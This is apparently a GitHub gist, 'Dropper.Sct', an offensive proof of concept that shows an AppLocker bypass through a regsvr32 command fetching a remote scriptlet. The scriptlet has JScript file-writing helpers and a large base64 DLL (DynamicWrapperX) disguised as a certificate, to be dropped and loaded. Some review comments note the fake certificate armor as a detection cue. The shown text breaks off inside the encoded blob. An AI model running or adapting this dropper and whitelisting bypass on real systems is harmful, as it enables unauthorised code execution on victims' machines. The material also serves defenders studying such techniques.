
@subTee /Dropper.Sct Secret
Last active Apr 11, 2017

Drops and Executes SCT - Bypass AppLocker Script Rules -- C:\Windows\SysWow64\regsvr32.exe /s /u /i:[THIS URL] scrobj.dll
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
// I/O mode values handed to FileSystemObject.OpenTextFile by the helpers below.
// Reference MSDN https://msdn.microsoft.com/en-us/library/aa265347(v=vs.60).aspx
var fsoForReading = 1,  // used by LoadStringFromFile
    fsoForWriting = 2;  // used by SaveStringToFile
/**
 * Block the script for roughly `delay` milliseconds by polling the clock.
 * This is a busy-wait: the hosting process spins on the CPU until the
 * deadline passes.
 *
 * @param {number} delay - time to wait, in milliseconds
 */
function sleep(delay)
{
    var deadline = new Date().getTime() + delay;
    var now = new Date().getTime();
    while (now < deadline) {
        now = new Date().getTime();
    }
}
/**
 * Read the whole text file `filename` through Scripting.FileSystemObject
 * and return its contents as a string.
 *
 * The file is opened with fsoForReading and create=true (third argument),
 * so a missing file is created rather than reported as missing.
 * Nothing in the visible script calls this helper.
 *
 * @param {string} filename - path of the file to read
 * @returns {string} the file contents
 */
function LoadStringFromFile(filename)
{
    var fileSystem = new ActiveXObject("Scripting.FileSystemObject");
    var stream = fileSystem.OpenTextFile(filename, fsoForReading, true);
    var contents = stream.ReadAll();
    stream.Close();
    return contents;
}
/**
 * Write `textString` to `filename` through Scripting.FileSystemObject.
 *
 * The file is opened with fsoForWriting and create=true, so it is created
 * if absent. Callers in this script pass bare file names, so the output
 * lands in the hosting process's current directory.
 *
 * @param {string} filename   - path of the file to write
 * @param {string} textString - text to store in the file
 */
function SaveStringToFile(filename, textString)
{
    var fileSystem = new ActiveXObject("Scripting.FileSystemObject");
    var stream = fileSystem.OpenTextFile(filename, fsoForWriting, true);
    stream.Write(textString);
    stream.Close();
}
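// Example File Prep
// Output of 'certutil.exe /encode AllTheThingsx64.dll AllTheThingsx64.txt'
// Why bother writing a terrible Base64 encode/decode routine, when certutil.exe will do it for you.
// NOTE(review): the file name above is only an example; the blob below is named x86dllEncoded and its
// embedded strings read DynamicWrapperX / dynwrapx.dll. A "-----BEGIN CERTIFICATE-----" armor whose body
// starts with "TV" (a base64-encoded MZ header) is a PE file, not a certificate, and is worth alerting on.
//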
var x86dllEncoded = "-----BEGIN CERTIFICATE-----\
TVpsAAEAAAACAAAA//8AAAAAAAARAAAAQAAAAAAAAABXaW4zMiBQcm9ncmFtIQ0K\
JLQJugABzSG0TM0hYAAAAEdvTGluaywgR29Bc20gd3d3LkdvRGV2VG9vbC5jb20A\
UEUAAEwBBwA1dfhIAAAAAAAAAADgAA4hCwEAJgAYAAAAGAAAAAAAAAAQAAAAEAAA\
ADAAAAAAABAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAkAAAAAQAAJTZAAACAAAA\
AAAQAAAAAQAAABAAABAAAAAAAAAQAAAAAHAAALwAAACEYAAAZAAAAABQAACgAwAA\
AAAAAAAAAAAAAAAAAAAAAACAAACgAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6GAAAGgAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAABjb2RlAAAAAHAXAAAAEAAAABgAAAAEAAAAAAAAAAAAAAAAAAAgAABg\
ZGF0YQAAAABQBAAAADAAAAACAAAAHAAAAAAAAAAAAAAAAAAAQAAAwGNvbnN0AAAA\
gAcAAABAAAAACAAAAB4AAAAAAAAAAAAAAAAAAEAAAEAucnNyYwAAAKADAAAAUAAA\
AAQAAAAmAAAAAAAAAAAAAAAAAABAAABALmlkYXRhAABiAwAAAGAAAAAEAAAAKgAA\
AAAAAAAAAAAAAAAAIAAAYC5lZGF0YQAAvAAAAABwAAAAAgAAAC4AAAAAAAAAAAAA\
AAAAAEAAAEAucmVsb2MAAKACAAAAgAAAAAQAAAAwAAAAAAAAAAAAAAAAAABAAABC\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
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\
VVZXU4nlg+wEg30YAHRgi10YizNT/1YEizU4MAAQiz0wMAAQgf/4HAAQd0tqAP91\
IP91HGoB6N77//9yKVBSUf91GI8Gj0YEj0YIj0YMg8YQiTU4MAAQifgDPTQwABCJ\
PTAwABD4iexbX15dwhAAuA4AAoD56++4CgACgPnr51VWV1OJ5YPsMInji3UUi1YI\
i04EiU30ichAweAEKcSJZeyLRRiDwASLPlBTUVJX6KkAAACJTfzHRfAAAAAAx0X4\
AAAAAIsfZsdF3AAAx0XkAAAAAFWDBCTUagBqAWhGMAAQaJhAABBX/1MUhcB1Sf9F\
9GoAagBVgwQk3FWDBCTsagFqAGiYQAAQ/3XUV/9TGIXAdUWDfgwAdA//dgxVgwQk\
3OikAQAAcjCLTfyD6QSJ7FtfXl3CCABqAGoAVYMEJNxVgwQk7GoBagBomEAAEGoA\
V/9TGIXAdLsxwOvMVVZXU4nlg+wEi00ci10gg+sQ/3UUagmPA49DCOMui30ki3UY\
/K3B4AIFPEUAEIsQhdJ0JIPrEFFXU1LoLwcAAFlyDInH4t6J+StNJDHA+InsW19e\
XcIUALgFAAKA+evvjwQMAczDieBQaFAwABDosP7//+vrieBQaGAwABDoof7//+vc\
ieBQaHAwABDokv7//+vNieBQaIAwABDog/7//+u+ieBQaJAwABDodP7//+uvieBQ\
aKAwABDoZf7//+ugieBQaLAwABDoVv7//+uRieBQaMAwABDoR/7//+uCieBQaNAw\
ABDoOP7//+lw////ieBQaOAwABDoJv7//+le////ieBQaPAwABDoFP7//+lM////\
ieBQaAAxABDoAv7//+k6////ieBQaBAxABDo8P3//+ko////ieBQaCAxABDo3v3/\
/+kW////ieBQaDAxABDozP3//+kE////ieBQaEAxABDouv3//+ny/v//VVZXU4nl\
g+wEi10Ui3UYZoM7CXRDiw3YQQAQicpmiwO/yEEAEPzyZq91QynKSsHiAosGweAF\
AdCNgNxBABCLAIXAdCpqAGoAU1DoNwAAAInsW19eXcIIAItDCGaDeCwDdAdmg3gs\
BXWsjVgs66e4BQACgPmJ7FtfXl3CCACQkJCQkJCQkJBVVldTieWD7BSLdRiLRgiL\
fRz/VRRyBoX/eAKJ+InsW19eXcIQACX/AAAA6wGYg+8EeAKJB/jDm9vj2UYI6wab\
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\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
RHluYW1pY1dyYXBwZXJYAHs4OTU2NTI3NS1BNzE0LTRhNDMtOTEyRS05NzhCOTM1\
RURDQ0N9AFNvZnR3YXJlXENsYXNzZXNcRHluYW1pY1dyYXBwZXJYAFNvZnR3YXJl\
XENsYXNzZXNcQ0xTSURcezg5NTY1Mjc1LUE3MTQtNGE0My05MTJFLTk3OEI5MzVF\
RENDQ30AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAARgEAAAAAAAAA\
wAAAAAAAAEYABAIAAAAAAMAAAAAAAABGdVJWiRSnQ0qRLpeLk17czK8SABD2EgAQ\
/BIAEAITABBsEwAQ6EAAEI4TABDkEwAQ9BMAECUUABAtFAAQNRQAEK4UABBBZHZh\
cGkzMi5kbGwAUmVnQ3JlYXRlS2V5RXhBAFJlZ1NldFZhbHVlRXhBAFJlZ0Nsb3Nl\
S2V5AEluUHJvY1NlcnZlcjMyACVzXCVzAENMU0lEACVzXCVzAHNobHdhcGkuZGxs\
AFNIRGVsZXRlS2V5QQAAAGwAaAB1AHAAbgB0AGMAYgBkAGYAdwBzAHoATABIAFUA\
UABOAFQAQwBCAEQARgBXAFMAWgAaAAAAAwACABEABQAEAAkAAAAIAAgAAAC+HQAQ\
vR0AELYdABDPHQAQxx0AEAAAAAAAAAAAAAAAAPgdABD3HQAQ8B0AEAkeABABHgAQ\
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\
aQBvAG4AIABjAGEAbABsAHMAIABpAG4AIABKAFMAYwByAGkAcAB0ACAAYQBuAGQA\
IABWAEIAUwBjAHIAaQBwAHQALgAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEA\
bQBlAAAAAAAAAAAAVgAXAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4A\
AAAAAEQAeQBuAGEAbQBpAGMAVwByAGEAcABwAGUAcgBYACAAbwBiAGoAZQBjAHQA\
AAAAACoABQABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAAMAAAAAAA\
MgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABkAHkAbgB3AHIAYQBwAHgA\
AAAAAEoAEwABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAKkAIABZAHUA\
cgBpACAAUABvAHAAbwB2ACwAIAAyADAAMAA4AAAAAABCAA0AAQBPAHIAaQBnAGkA\
bgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAZAB5AG4AdwByAGEAcAB4AC4AZABsAGwA\
AAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAARAB5AG4AYQBtAGkA\
